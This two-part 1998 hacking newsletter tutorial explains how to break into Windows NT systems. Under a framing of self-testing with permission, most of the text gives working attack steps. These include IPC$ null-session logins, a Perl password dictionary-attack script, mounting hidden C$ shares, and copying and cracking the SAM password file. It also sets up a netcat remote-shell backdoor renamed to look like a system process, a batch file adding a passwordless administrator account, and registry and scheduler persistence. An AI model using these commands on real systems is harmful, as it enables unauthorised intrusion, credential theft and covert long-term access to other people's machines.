__________________________________________________________ 
GUIDE TO (mostly) HARMLESS HACKING 
Vol. 3 No. 10  Part 1 
How to Break into Windows NT 
____________________________________________________________ 
by keydet89@yahoo.com 
"Improving the security of your site by breaking into it, the 
NT version" 
The purpose of this article is to illustrate to NT users (and 
sysadmins) how to test and verify the security of their own 
system or site by breaking into it, using the techniques that 
an attacker would use.  Further, this guide assumes that you 
are using NT to test an NT system...the Win95 versions of the 
commands used in this guide aren't as powerful as the NT 
versions. 
*********************************************************** 
YOU COULD GO TO JAIL WARNING:  Gaining unauthorized access to 
computers is against the law...read the GTMHH files on computer 
crime and the law.  If you want to try out some or all of the 
techniques presented here, make sure that you get permission. 
*********************************************************** 
In 1993, Dan Farmer and Wietse Venema wrote a paper called 
"Improving the security of your site by breaking into it."  This 
paper took the view of "what better way to test your computer and 
network security of your site than by breaking into it."  This is 
a good view to take...try using "hacker" techniques to break into 
your site to see how vulnerable you are.  The paper in question 
can be found at:  http://www.trouble.org/security. 
A good place to start for reference is a previous GTMHH entitled 
"NT Security - Locking down the system".  This guide discusses some 
of the steps that need to be taken to secure an NT workstation or 
standalone server.  The guide also contains links to files that 
contain more in-depth information and explanations, as well as 
information particular to sysadmins. 
In review of the previous guide, some "light" reading: 
Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt 
Vacuum's NT Exploits document at http://207.89.195.250/texts/ 
NeonSurge's documents at http://207.89.195.250/texts/ 
Santeria Systems' "Hardening NT" document at 
http://pw2.netcom.com/~honeyluv/index.html 
Most of the techniques outlined in this guide are meant to be run 
against the local system, by using the IP address assigned by your ISP. 
However, it's more fun to get with your friends, and connect your 
systems to the Internet.  Then meet at one location, and try these 
techniques against your own systems. The methods described in this 
guide are intended to be exercises for the reader. 
[The Remote Attack] 
In order to protect your system from outside attack, you need to 
think like an attacker.  What does an attacker want with your 
system?  Access...it's all about access.  Regardless of the motives 
or ultimate goals, an attacker wants access.  Preferably, root/admin 
access...the attacker wants to gain administrator access to your 
system, or "own" your system.  So to ensure that your system is 
secure, you need to "attack" it the way the attacker would. 
To begin with, you need to see what the attacker sees.  In order 
to find potentially vulnerable NT (or 95) systems, all you need to 
do is scan a range of IP addresses to see if port 139 is open.  Port 
139 is the "NetBIOS session" port, that is used in file and print 
sharing...which is potentially the most dangerous aspect of NT!  To 
locate systems with port 139 active, get a port scanner like Sam 
Spade (http://www.blighty.com).  Sam Spade lets you scan a range of 
IP addresses for a single port.  Try running whichever port scanner 
you use against your own system. 
******************************************************************** 
NEWBIE NOTE:  Finding a system with port 139 open does not auto- 
matically mean that the target system is 95 or NT.  Un*x and Linux 
systems run SAMBA, which allows them to share file "the Microsoft 
way".  However, the focus of this guide is NT, so we'll leave 
SAMBA for another day. 
******************************************************************** 
Okay, so you've run a port scanner against your own system and 
found port 139 open.  The next step is to run the "nbtstat" command 
against your own system: 
c:\>nbtstat -A [ipaddr] 
NOTE:  Make sure you use the capital "A", and the IP address 
assigned by your ISP when you dial in.   To see the IP address 
that you were assigned, type "ipconfig /all" at the command prompt. 
This will return the NetBIOS Name Table of your system.  The files 
mentioned above from the Rhino9 site (http://207.89.195.250/texts/) 
go into more detail regarding what everything in the table refers 
to, but what we (and the attacker) are interested in are the hex 
codes in the center column of the table.  If you see a code '<20>', 
this means that your system is advertising that it has shares available. 
The scary thing is that these shares are potentially avialable via 
the Internet!!  I say "potentially" because we haven't checked yet. 
Okay, if you haven't seen the '<20>' code, then you can be relatively 
sure that you are safe, to some degree.  Just remember, as long as a 
computer is turned on, and especially when it's connected to the 
Internet, there is no such thing as 100% security. 
If you do see the '<20>' code, then the next step is to gather a little 
information about our system.  To do that, we need to go to: 
http://www.ntsecurity.com/ and get a copy of the RedButton program. 
RedButton is a nifty little proof-of-concept program to show that 
it is possible to log onto an NT system without presenting a username 
or password.  The NTSecurity.com site 
(http://www.ntsecurity.com/RedButton/default.htm) describes the 
RedButton 
program.  Run the program against your own system, and see what type 
of information is available.  You will see any available shares, to 
include any hidden admin shares (ie, shares that end in "$".  By 
default, there are several of these shares available...C$, WINNT$, 
IPC$, etc). 
The next step is to attempt to log into your system by using the 
"net" command.  To do this, you need to attempt to connect to the 
"IPC$" share, which is one of default, hidden shares that is part of 
the NT installation.  Attempting to make this connection is best done 
from a remote machine, preferably a friend's NT system. 
Attempt the connection by typing: 
c:\>net use \\[ipaddr]\ipc$ 
******************************************************************** 
NEWBIE NOTE:  The IPC$ share isn't a "share" in the sense that it 
is a directory, disk or printer.  First off, you can see by the "$" 
that it's an admin share that is created by default when the system 
is booted.  IPC stands for "interprocess communications", and the 
IPC$ share provides the capability for logging into the system. 
Remember that...if the sysadmin for the target server has enabled 
auditing of successful and failed login attempts, then the IPC$ 
connection attempt will show up in the EventLog.  This is true even 
if you don't successfully log in...it's recorded as a failed login 
attempt. 
The concept of the IPC$ share is covered in greater detail in Hobbitt's 
CIFS file at http://207.98.195.250/texts/cifs.txt and Vacuum's NT 
Exploits document at http://207.89.195.250/texts/. 
******************************************************************** 
When this connection is attempted, the currently logged on username 
and password from the local system are sent for authentication.  If 
you are logged on as "Administrator", this may not be a problem, and 
only password guesses will be required.  If you (rather foolishly) use 
a "null" password (ie, don't use a password at all), then logging in 
is a trivial matter.  You may laugh, but you would be surprised at the 
number of NT systems that don't have a password for the Administrator 
account. 
The 'net' command can also be run using username and password guesses: 
c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:<name> <passwd> 
This command will either fail, or be completed successfully...the 
command will not pause waiting for further input, such as a password. 
That makes this syntax very easy to add to scripts and batch files. 
NAT (a program available from http://www.secnet.com) will automate 
these attempts, based on user-configurable files.  NAT can be used in 
conjunction with dictionary files and wordlists to attack specific user 
accounts, such as Administrator.  If you have changed the name of the 
Administrator account, as suggested by Microsoft and various 
professinal security consulting firms, you can still use RedButton to 
determine what that new name is and attack it. 
Download a copy of NAT (you can get versions of NAT for 95/NT or 
Linux) and try running it against either your system or your buddy's 
system. 
The downside of NAT is that when given two files, it tries the first 
username and all of the passwords in the password list, before moving 
on to the second username.  NAT can be configured to some degree but 
you can also use tools such as Perl to configure this "dictionary 
attack" to your own tastes.  You can create a Perl script that 
includes the following command: 
open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user:<name> <passwd> | "); 
******************************************************************** 
NEWBIE NOTE:  Perl is a great programming language to learn on your 
way to other languages, such as C or Java.  It's an interpretted 
language, like Java, but much faster than Java.  Also, just about 
every Un*x sysadmin knows how to program in Perl.  Fortunately, there 
is a version of Perl available for 95 and NT at 
http://www.activestate.com .  There is also a wealth of reference 
material and examples of Perl scripts available from 
http://www.perl.com. 
******************************************************************** 
The following Perl script can be used to conduct a dictionary attack 
against your own system or a friend's system (with his permission, of 
course): 
-----  begin script  ----- 
# ipcchk.plx by Keydet89 
# script to take names from a text file, and attempt to 
# complete the IPC$ connection using the name as both the 
# username and password 
# successful connections are logged to the log file 
# no checking of arguments is provided, user must enter a 
# valid IP address for the target server 
# 
# usage: c:\>perl ipcchk.plx [ipaddr] 
open(TEST, "names.txt") || die "Could not open file."; 
open(LOG,">>ipc.log") || die "Could not open log."; 
if (length($ARGV[0]) == 0) { 
  print "Usage: perl ipcchk.plx [ipaddr]"; 
  exit(0); 
} 
$server = ARGV[0]; 
while(<TEST>) { 
  $name = $_; 
  chop($name); 
# print "net use \\\\$server\\ipc\$ /user:Administrator $name | \n"; 
  open(IPC, "net use \\\\$server\\ipc\$ /user:Administrator $name | "); 
  while(<IPC>) { 
    if (grep(/successfully/,$_)) { 
       print LOG "$server accepts connections for password $name\n"; 
# delete a successful connection to avoid multiple connections to 
# the same machine 
       open(DEL, "net use \\\\$server\\ipc\$ /d | "); 
    } 
} 
-----  end script  ----- 
This script is easily configurable, and can be run on a system with 
Perl for Win32 installed.  For information on installing Perl for 
Win32 on your 95 or NT system, see: 
http://reference.perl.com/query.cgi?windows 
Minor modifications to this script will allow you to conduct a similar 
attack against other accounts on your system. 
The IPC$ share is the key to compromising an NT server.  It is only 
following a successful connection that the real work toward exploiting 
this vulnerability can be done.  This is especially true if you've 
gained access via the Administrator account, or an account in the 
Administrator group. 
Once you have successfully completed an IPC$ connection to your 
buddy's machine, you can then try to see if he has any shares 
available using the 'net' command: 
c:\>net view \\[ipaddr] 
Depending upon how your friend set up his machine, there may or may not 
be shares available.  If shares are available, you can attempt to 
connect to them using the 'net' command: 
c:\>net use x: \\[ipaddr]\[share] 
If this command doesn't work the first time, don't worry.  You can 
follow the same steps as above to attempt a dictionary attack.  You 
shouldn't need to, however...if you gained access to your friend's 
machine via the Administrator account. 
But you're not safe just because you haven't specifically made 
shares available yourself.  Even if the C:\ drive itself isn't 
specifically shared on the server, you still have access to it as the 
C$ share if the IPC$ connection leads to Administrator access.  Once 
the connection to the IPC$ share is successfully completed, the next 
command to attempt is: 
c:\>net use g: \\xxx.xxx.xxx.xxx\c$ 
******************************************************************* 
NEWBIE NOTE:  Notice this command is a little different from the 
earlier version of the "net use" command.  In this case, the "c$" 
share is a physical disk on the target server, so you need to 
assign it a device name on your local machine.  To see the syntax 
for this command, enter "net use /?" at the command prompt. 
******************************************************************* 
Once you've gained access to the C$ share you, type: 
c:\>dir g: /p 
to view the contents of your friend's C:\ drive. 
If you have successfully completed the IPC$ connection, you can do 
other things besides access 'hidden' (as in 'not anymore!!') shares. 
Once your friend creates an account for you and places it in the 
Administrator group, log in via the IPC$ connection.  Then click 
Start -> Run, and type 'regedit'.  Choose Registry -> Connect 
Network Registry..., and type the IP address of your friend's machine 
into the dialogue box.  Wait a minute, and you will be able to view 
parts of his Registry. 
[Password Cracking] 
If you gain access to the system (I should say 'your' system), then 
there are several things you can do.  Let's say you've gone after 
/etc/passwd files on Un*x systems...how would you do this on an NT 
system?  NT keeps user passwords in SAM (Security Accounts Manager) 
file.  When a system is turned on, you generally can't access 
this file, especially if you are a regular user (ie, not Administrator). 
However, in the c:\winnt\repair directory, you will see a file 
called "SAM._".  This is the compressed version of the SAM database 
that is created when the system is installed, and updated whenever 
the rdisk utility is run.  Users have the ability to read (and copy) 
this file. 
Note:  The next exercise is intended to be run on your own machine. 
However, once you have access to a friend's computer and connected to 
the C$ share (shown above), you can get a copy of the SAM._ file from 
his machine by typing: 
c:\>copy g:\winnt\repair\sam._ 
So let's have a little fun.  First, create several user accounts in 
User Manager, using blank or easily guessable passwords...words from 
the dictionary, etc.  You can use these accounts to either try 
breaking into your system, or provide valid accounts to your friends 
so that only they can log in.  After you've created the accounts, 
have a couple of blank, formatted diskettes available, and type: 
c:\>rdisk /s 
Follow the instructions that appear in the windows.  When you're done, 
go to the c:\winnt\repair directory, and copy the "SAM._" file to 
another directory (for the purposes of this exercise, c:\temp). 
Now type: 
c:\temp>expand SAM._ sam 
Now pass the file through SAMDump (you can find SAMDump at 
http://www.nmrc.org/files/snt/index.html) in order to put the file 
in a format that is usable by a password cracker: 
c:\temp>samdump sam > samfile 
You now have a usable "samfile".  Now you just need to run a 
password cracker, such as l0phtcrack (from either http://www.l0pht.com 
or http://www.nmrc.org/files/snt/index.html) or NTCrack (from 
either http://www.secnet.com or 
http://www.nmrc.org/files/snt/index.html) 
Once you gain access to your friend's computer, you can leave little 
backdoors and practical jokes...if your friend has a sense of humor. 
Coming next GTMHH: WinNT Back Doors and Practical Jokes! 
_______________________________________________________________________ 
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out 
the official Happy Hacker Web page at http://www.happyhacker.org. 
We are against computer crime. We support good, old-fashioned hacking of the 
kind that led to the creation of the Internet and a new era of freedom of 
information. But we hate computer crime.  So don't email us about any crimes 
you have committed! 
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless 
Hacking, please email hacker@techbroker.com with message "subscribe 
happy-hacker" in the body of your message. 
Copyright 1998 keydet89.  You may forward, print out or post this 
GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave 
this notice at the end. 
_________________________________________________________ 



__________________________________________________________ 
GUIDE TO (mostly) HARMLESS HACKING 
Vol. 3 No. 10  Part 2 
How to Break into Windows NT: Backdoors and Practical Jokes 
____________________________________________________________ 
by keydet89@yahoo.com 
  
[Backdoors and Practical Jokes] 
Creating backdoors is how you can insure your ability to return to the 
system at will.  This is almost a black art when dealing with Un*x 
systems, and it can also be done on NT. 
netcat, from Weld Pond, takes advantage of any user's ability to use 
a local port.  netcat is a command-line utility that has several 
switches used to configure it's operation.  This makes netcat, combined 
with a properly configured command-line launched from a batch file, 
an excellent choice for a backdoor. 
(get netcat for NT from http://www.l0pht.com/weld) 
The batch file needs to contain: 
nc -L -d -p [port] -t -e cmd.exe 
 L  tells netcat to open keep listening after the current 
  session terminates 
 d detach - don't open a DOS window when running (IMPORTANT) 
 p which port to bind to 
 t enable telnet negotiations 
 e command to execute upon connection 
Copy this command line into a batch file named "runnc.bat" or 
something similar.  Then copy both the netcat executeable file and 
the batch file to a directory that is in the PATH on the target 
machine...c:\winnt\system32\ is a good place to hide them.  Another 
little trick to keep in mind is to rename the netcat executable from 
'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to 
make the appropriate changes to the batch file).  That way, when you 
or your buddy opens the TaskList, there won't seem to be any 'unusual' 
programs running.  Run the batch file on your own machine, and open 
the TaskList (right-click on the TaskBar, and choose TaskList)... 
Once this batch file is run, all you need to do is connect via telnet, 
or netcat in client mode: 
c:\>nc -v [ipaddress of target] [port] 
So how do you run this batch file?  By default, NT doesn't have an 
interactive telnet server installed so that you can just log in, so 
what do you do?  Well, there is a great little service called the 
Schedule (or 'AT') service, which lets you schedule programs to be 
run at a later date.  To see if your Schedule service is running, 
you can either click Control Panel -> Services, and check it, or 
if you have Perl installed (see above), you can run the following 
script to see if the service is running, and if not, start it: 
-----  begin script  ----- 
# atchk.plx 
# Script checks to see if AT service is running on local 
# machine...if not, starts it.  Minor modifications will 
# allow you to do the same thing on a remote machine, once 
# have successfully completed the IPC$ connection and have 
# Administrator rights. 
# 
# usage: perl atchck.plx 
use Win32::Service; 
use Win32; 
my %status; 
Win32::Service::GetStatus('','Schedule', \%status); 
die "service is arealdy started\n" if ($status{CurrentState} == 4); 
Win32::Service::StartService(Win32::NodeName( ),'Schedule') || die 
"Can't start service\n"; 
print "Service started\n"; 
#**Note:  This script was modified from: 
#http://www.inforoute.cgs.fr/leberre1/perlser.htm 
-----  end script  ----- 
Note:  Only Administrators or members of the Administrators group can 
run the AT command. 
Once installed, the 'runnc.bat' file can be executed via the AT command. 
The necessary syntax for the AT command is: 
AT [\\computername] [time] "command" 
or more particularly: 
AT [\\computername] [time] runnc.bat 
References to commands can be hidden in various places within the 
registry, set to run when a user logs in: 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
Note:  This last key is where you will find things like AOL's 
Instant Messenger.  The install puts the reference to the app there, 
but you won't find it in your StartUp box... 
Here's another little exercise that you should run on your own machine 
first, and then try copying it over to a friend's machine and running 
it via the AT command.  The batch file below uses commands that are 
native to NT to create a new user account, then make that user a member 
of the Administrator group: 
-----  begin batch file  ----- 
@echo off 
net user Admin /add /expires:never /passwordreq:no 
net localgroup "Administrators" /add Admin 
net localgroup "Users" /del Admin 
-----  end batch file  ----- 
What are some other neat little tricks to try?  Get Netbus from 
http://netbus.hypermart.net/ .  This little program is similar to 
Back Orifice, and it runs on NT.  (Visit the makers of Back Orifice 
at http://www.cultdeadcow.com/) 
Okay, so you and your 'leet buddies have played around with each 
other's machines via the Internet, and pretty much walked through the 
exercises listed above.  Now, what are some local 'attacks' that you 
can run against your own machine? 
[Local Attacks] 
Let's say you have a couple of accounts on your NT box, at least one 
with Admin rights, and one or two others with user rights.  You've 
already run through the password cracking exercise and seen how easy 
it is to get the 'SAM._' file and crack it.  So what else can you do? 
Well, you try the 'getadmin' exploit.  This exploit consists of a 
program and .dll file that will add the user to the Administrator group. 
Get the necessary files from: 
http://www.nmrc.org/files/nt/index.html 
The Microsoft site has a hotfix for the "getadmin" exploit, located 
at: 
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/ 
nt40/hotfixes-postSP3/getadmin-fix/ 
General information on security problems addressed by Microsoft 
can be found at: 
http://www.microsoft.com/security/issues.htm 
For more information on the 'getadmin' exploit, go to: 
http://www.ntsecurity.net 
and search for 'getadmin'. 
All you need to do to test this exploit is log onto your system via 
a user account, copy the files into a directory, and run getadmin.exe. 
Another local exploit similar to the "getadmin" exploit has popped up. 
The exploit works like this:  the user runs a program called 
"sechole.exe" and the final result (possibly after a reboot) is that 
the user now has administrator rights!  For more information on this 
and the zipped archive "sechole.zip", go to: 
http://www.technotronic.com/microsoft.html 
A variation on this exploit involves the Registry setting the 
determines what the default debugger (the program run when a user mode 
program crashes) is run. 
Usually, the setting is: 
Hive: HKEY_LOCAL_MACHINE 
Key:  \Software\Microsoft\Windows NT\CurrentVersion\AeDebug 
Value: Debugger 
Data Type: REG_SZ 
Default Value: drwtsn32 -p %ld -e %ld -g 
The "Everyone" group has the ability to set the value of this key, and 
is essential how you can exploit it.  The debugger runs in the security 
context of the crashed application, so all you need to do is change the 
Default Value (via 'regedit') to point to the User Manager, and then 
crash one of the services that are running.  Then you can add accounts 
to the User Manager...even to the Administrator group. 
******************************************************************* 
NEWBIE NOTE:  Before any changes are made to the Registry, make 
sure that you make a backup of your current Registry using the 
"rdisk /s" utility.  You can make changes to the Registry by clicking 
Start -> Run, and entering either 'regedit' or 'regedt32'.  Before 
you attempt any of this, read the files pertaining to the Registry 
from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's 
Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) 
and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html). 
******************************************************************* 
Another local exploit that you can attempt uses the NTFSDOS utility, 
which is nothing more than a bootable DOS diskette that can read (but 
not write to) NTFS partitions.  This would potentially allow an attacker 
to make off with copies of systems files, to include the SAM database. 
The folks at Systems Internals (http://www.sysinternals.com) have not 
only an NTFSDOS utility available, but also some tools that give the 
user limited write capability.  SysInternals also has NTRecover and 
NTLocksmith, along with a variety of other useful tools. 
Get a copy of the utility, and try booting your own system with the 
diskette in the A:\ drive. 
There is a nifty little utility available, one that is essentially a 
Linux boot disk: 
http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html 
The utility comes with rawrite.exe, so that DOS and Windows users can 
download the utility and create the Linux boot disk. 
The utility is a NTFS-bootable minimal kernel, with a small program 
that allows the user to change any password in the SAM database. 
Alternatively, you can find the Linux binary file (without the 
rawrite.exe utility) at: 
http://www.nmrc.org/files/snt/index.html 
called bootdisk.bin, and according to the description, this is the 
file you are interested in.  You will still need to get a copy of 
rawrite.exe, in order to write the information to a diskette in a 
useable form. 
Carefully read the instructions on the web page for the utility 
(listed above) and if you are feeling especially '31337', try it out 
against your own system. 
[Final Words] 
By now you should be familiar with some of the methods used to attack 
and compromise an NT system.  Hopefully, you have seen fit to try out 
the exercises on your own system, or against a friend's system (with 
permission, of course).  And it should start becoming clear what it 
takes to secure a system from attack.  The first step is to become 
familiar with various exploits by regularly visiting such sites as 
RootShell (http://www.rootshell.com), the ISS X-Force site 
(http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), 
and NTBugTraq (http://www.ntbugtraq.com).  Then go to the Microsoft 
Support (http://support.microsoft.com) and Security 
(http://www.microsoft.com/security) sites to see what the 'official' 
fixes are...the NTBugTraq site does a great job of keeping track of 
the latest hotfixes, and which ones are obsolete.  The Microsoft Support 
site is especially useful, because you can search for information or 
specific KnowledgeBase articles, and print out those that you find 
useful.  The "Hardening NT" document from Santeria Systems 
(http://pw2.netcom.com/~honeyluv/index.html) provides an excellent 
guide for protecting your system, complete with references to the 
appropriate KnowledgeBase article for each step.  Finally, Microsoft 
maintains a list of security bulletins at: 
http://www.microsoft.com/security 
  
_______________________________________________________________________ 
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out 
the official Happy Hacker Web page at http://www.happyhacker.org. 
We are against computer crime. We support good, old-fashioned hacking of the 
kind that led to the creation of the Internet and a new era of freedom of 
information. But we hate computer crime.  So don't email us about any crimes 
you have committed! 
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless 
Hacking, please email hacker@techbroker.com with message "subscribe 
happy-hacker" in the body of your message. 
Copyright 1998 keydet89.  You may forward, print out or post this 
GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave 
this notice at the end. 
_________________________________________________________